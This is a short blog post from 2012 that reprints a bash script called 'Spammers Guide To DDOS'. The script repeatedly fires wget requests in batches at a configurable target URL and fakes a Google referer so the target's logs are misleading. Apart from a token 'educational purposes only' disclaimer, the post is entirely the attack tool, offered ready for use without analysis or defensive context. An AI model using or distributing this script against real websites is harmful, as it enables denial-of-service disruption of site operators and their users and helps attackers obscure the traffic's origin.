Sunday, November 4, 2012

(Bash) DDOS Tool by Mycosis

    #!/bin/bash
    ##################################################
    ## Spammers Guide To DDOS   ##                   #
    ## Created by: Mycosis      ##    We <3 Linux    #
    ## Version: 0.3             ##                   #
    ## Last update: 2010-09-03  ######################
    ## Updated by: Mycosis (us-pata)                 #
    ## Url: https://sourceforge.net/projects/sgddos/ #
    ##################################################
    ## This script is intended for educational       #
    ## purposes ONLY! The developer team             #
    ## takes no responebility for any                #
    ## missuse of this given script.                 #
    ##################################################
     
     
    #---- Settings for SGDDOS ----#
     
    #How many times should the page get loaded?
    NUM=100
     
    #How many connections per sleepcycle
    BATCH=5
     
    #How many seconds beetween each sleep cycle
    SLEEPTIME=1
     
    #What site do you want to be the referer in your target's logs?
    REFERER=http://www.google.com
     
    #Enter your target URL
    TARGET=http://www.your-target.com
     
    #----------------------------------------------#
    #---- Do NOT edit anything below this line ----#
    #----------------------------------------------#
     
    echo Initiating wget procs...
    I=0 #Batch loop
    SP=0 #Spam
    while [  $I -lt $NUM ]; do
            let I=I+BATCH
            GL=0
     
            while [ $GL -lt $BATCH ]; do
                    let GL=GL+1
                    let SP=SP+1
     
                    # Target URL is specefied in the top of the script along with other settings
                    echo Spam number $SP has been initiated
                    wget -quiet --output-document /dev/null --referer="$REFERER" $TARGET > /dev/null 2>&1
     
            done
     
            if [ $I -lt $NUM ]; then
                    sleep $SLEEPTIME
            fi
    done
     
    echo Done calling $NUM wget procs!

No comments:

Post a Comment